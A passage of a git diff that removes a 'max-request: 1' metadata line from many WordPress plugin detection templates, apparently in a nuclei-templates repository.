tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index 6c9c485079..f688a68f72 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/better-wp-security/
metadata:
- max-request: 1
plugin_namespace: better-wp-security
wpscan: https://wpscan.com/plugin/better-wp-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/black-studio-tinymce-widget/
metadata:
- max-request: 1
plugin_namespace: black-studio-tinymce-widget
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/breadcrumb-navxt/
metadata:
- max-request: 1
plugin_namespace: breadcrumb-navxt
wpscan: https://wpscan.com/plugin/breadcrumb-navxt
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/breeze/
metadata:
- max-request: 1
plugin_namespace: breeze
wpscan: https://wpscan.com/plugin/breeze
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/broken-link-checker/
metadata:
- max-request: 1
plugin_namespace: broken-link-checker
wpscan: https://wpscan.com/plugin/broken-link-checker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/child-theme-configurator/
metadata:
- max-request: 1
plugin_namespace: child-theme-configurator
wpscan: https://wpscan.com/plugin/child-theme-configurator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/classic-editor/
metadata:
- max-request: 1
plugin_namespace: classic-editor
wpscan: https://wpscan.com/plugin/classic-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/classic-widgets/
metadata:
- max-request: 1
plugin_namespace: classic-widgets
wpscan: https://wpscan.com/plugin/classic-widgets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/
metadata:
- max-request: 1
plugin_namespace: click-to-chat-for-whatsapp
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml
index 425adf0bfe..e555bf93d3 100644
--- a/http/technologies/wordpress/plugins/cloudflare.yaml
+++ b/http/technologies/wordpress/plugins/cloudflare.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cloudflare/
metadata:
- max-request: 1
plugin_namespace: cloudflare
wpscan: https://wpscan.com/plugin/cloudflare
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cmb2/
metadata:
- max-request: 1
plugin_namespace: cmb2
wpscan: https://wpscan.com/plugin/cmb2
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/coblocks/
metadata:
- max-request: 1
plugin_namespace: coblocks
wpscan: https://wpscan.com/plugin/coblocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/code-snippets/
metadata:
- max-request: 1
plugin_namespace: code-snippets
wpscan: https://wpscan.com/plugin/code-snippets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/coming-soon/
metadata:
- max-request: 1
plugin_namespace: coming-soon
wpscan: https://wpscan.com/plugin/coming-soon
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/complianz-gdpr/
metadata:
- max-request: 1
plugin_namespace: complianz-gdpr
wpscan: https://wpscan.com/plugin/complianz-gdpr
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7-honeypot/
metadata:
- max-request: 1
plugin_namespace: contact-form-7-honeypot
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7/
metadata:
- max-request: 1
plugin_namespace: contact-form-7
wpscan: https://wpscan.com/plugin/contact-form-7
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-cfdb7/
metadata:
- max-request: 1
plugin_namespace: contact-form-cfdb7
wpscan: https://wpscan.com/plugin/contact-form-cfdb7
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cookie-law-info/
metadata:
- max-request: 1
plugin_namespace: cookie-law-info
wpscan: https://wpscan.com/plugin/cookie-law-info
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/cookie-notice/
metadata:
- max-request: 1
plugin_namespace: cookie-notice
wpscan: https://wpscan.com/plugin/cookie-notice
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/creame-whatsapp-me/
metadata:
- max-request: 1
plugin_namespace: creame-whatsapp-me
wpscan: https://wpscan.com/plugin/creame-whatsapp-me
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/creative-mail-by-constant-contact/
metadata:
- max-request: 1
plugin_namespace: creative-mail-by-constant-contact
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-css-js/
metadata:
- max-request: 1
plugin_namespace: custom-css-js
wpscan: https://wpscan.com/plugin/custom-css-js
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index d6200aaea4..814e603d75 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-fonts/
metadata:
- max-request: 1
plugin_namespace: custom-fonts
wpscan: https://wpscan.com/plugin/custom-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/custom-post-type-ui/
metadata:
- max-request: 1
plugin_namespace: custom-post-type-ui
wpscan: https://wpscan.com/plugin/custom-post-type-ui
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/disable-comments/
metadata:
- max-request: 1
plugin_namespace: disable-comments
wpscan: https://wpscan.com/plugin/disable-comments
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/disable-gutenberg/
metadata:
- max-request: 1
plugin_namespace: disable-gutenberg
wpscan: https://wpscan.com/plugin/disable-gutenberg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-page/
metadata:
- max-request: 1
plugin_namespace: duplicate-page
wpscan: https://wpscan.com/plugin/duplicate-page
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-post/
metadata:
- max-request: 1
plugin_namespace: duplicate-post
wpscan: https://wpscan.com/plugin/duplicate-post
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duplicator/
metadata:
- max-request: 1
plugin_namespace: duplicator
wpscan: https://wpscan.com/plugin/duplicator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/
metadata:
- max-request: 1
plugin_namespace: duracelltomi-google-tag-manager
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-fancybox/
metadata:
- max-request: 1
plugin_namespace: easy-fancybox
wpscan: https://wpscan.com/plugin/easy-fancybox
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml
index 96c813ad49..c9859e9770 100644
--- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml
+++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-google-fonts/
metadata:
- max-request: 1
plugin_namespace: easy-google-fonts
wpscan: https://wpscan.com/plugin/easy-google-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-table-of-contents/
metadata:
- max-request: 1
plugin_namespace: easy-table-of-contents
wpscan: https://wpscan.com/plugin/easy-table-of-contents
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/easy-wp-smtp/
metadata:
- max-request: 1
plugin_namespace: easy-wp-smtp
wpscan: https://wpscan.com/plugin/easy-wp-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/elementor/
metadata:
- max-request: 1
plugin_namespace: elementor
wpscan: https://wpscan.com/plugin/elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/elementskit-lite/
metadata:
- max-request: 1
plugin_namespace: elementskit-lite
wpscan: https://wpscan.com/plugin/elementskit-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/enable-media-replace/
metadata:
- max-request: 1
plugin_namespace: enable-media-replace
wpscan: https://wpscan.com/plugin/enable-media-replace
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/envato-elements/
metadata:
- max-request: 1
plugin_namespace: envato-elements
wpscan: https://wpscan.com/plugin/envato-elements
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/
metadata:
- max-request: 1
plugin_namespace: essential-addons-for-elementor-lite
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ewww-image-optimizer/
metadata:
- max-request: 1
plugin_namespace: ewww-image-optimizer
wpscan: https://wpscan.com/plugin/ewww-image-optimizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/facebook-for-woocommerce/
metadata:
- max-request: 1
plugin_namespace: facebook-for-woocommerce
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/fast-indexing-api/
metadata:
- max-request: 1
plugin_namespace: fast-indexing-api
wpscan: https://wpscan.com/plugin/fast-indexing-api
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/
metadata:
- max-request: 1
plugin_namespace: favicon-by-realfavicongenerator
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/flamingo/
metadata:
- max-request: 1
plugin_namespace: flamingo
wpscan: https://wpscan.com/plugin/flamingo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/fluentform/
metadata:
- max-request: 1
plugin_namespace: fluentform
wpscan: https://wpscan.com/plugin/fluentform
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/font-awesome/
metadata:
- max-request: 1
plugin_namespace: font-awesome
wpscan: https://wpscan.com/plugin/font-awesome
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/force-regenerate-thumbnails/
metadata:
- max-request: 1
plugin_namespace: force-regenerate-thumbnails
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/formidable/
metadata:
- max-request: 1
plugin_namespace: formidable
wpscan: https://wpscan.com/plugin/formidable
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/forminator/
metadata:
- max-request: 1
plugin_namespace: forminator
wpscan: https://wpscan.com/plugin/forminator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/ga-google-analytics/
metadata:
- max-request: 1
plugin_namespace: ga-google-analytics
wpscan: https://wpscan.com/plugin/ga-google-analytics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata:
- max-request: 1
plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 23a88ea130..88d38e21ed 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
metadata:
- max-request: 1
plugin_namespace: google-analytics-dashboard-for-wp
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-for-wordpress/
metadata:
- max-request: 1
plugin_namespace: google-analytics-for-wordpress
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 575c9ebe67..840c086fb9 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
